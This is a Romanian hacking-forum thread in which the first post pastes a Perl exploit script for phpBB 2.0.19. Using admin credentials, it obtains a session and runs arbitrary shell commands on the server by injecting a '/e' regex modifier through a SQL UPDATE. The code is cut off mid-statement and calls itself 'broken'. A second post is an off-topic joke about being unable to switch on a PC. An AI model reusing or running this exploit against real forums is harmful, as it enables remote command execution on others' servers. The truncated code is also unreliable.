Jump to content
ecstazy_kid

phpBB 2.0.19 Exploit

By ecstazy_kid, in Exploituri

Recommended Posts

ecstazy_kid Newbie

ecstazy_kid

Posted
Posted 

#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit

## version 2 (based on user_sig_bbcode_uid bug)

## tested on 2.0.12 , 2.0.13 , 2.0.19

## --------------------------------------------

## screen

## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password

## Command for execute or 'exit' for exit # id

## uid=80(www) gid=80(www) groups=80(www)

## Command for execute or 'exit' for exit # exit

## --------------------------------------------

## *** surprise included;) and broken. /str0ke

## 20/02/06

## 1dt.w0lf

## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;

use Getopt::Std;

use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;

$login    = $opt_L;

$password = $opt_P;

$id       = $opt_i || 2;

$prefix   = $opt_p || 'phpbb_';

$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;

$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );

$xpl->proxy('http'=>'http://'.$proxy) if $proxy;

$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;

$res = $xpl->post($url.'login.php',

[

"username"   => "$login",

"password"   => "$password",

"autologin"  => "on",

"admin"      => "1",

"login"      => "Log in",

],"User-Agent" => "$ids");

$cookie_jar->extract_cookies($res);

if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }  

while ()

{

   print "Command for execute or 'exit' for exit # ";

   while(<STDIN>)

    {

       $cmd=$_;

       chomp($cmd);

       exit() if ($cmd eq 'exit');

       last;

    }

   &run($cmd);

}

sub run($)

{  

$sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e

virusz Rookie

virusz

Posted
Posted

ai mura in gura direct pe forum, cauta mai, nu cere atata!

Cine imi zice si mie cum pornesc pc-ul? (acum sunt la un club si era pornit), la mine are doar 2 butoane si 2 "becuri" :D,nu stiu pe care sa apas, am apasat pe amandoua dar nu merge.... nu stiti?

PS: cred ca nu l-am bagat in priza.... dar parca se aude ceva inauntru... o fii un hertz ratacit!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...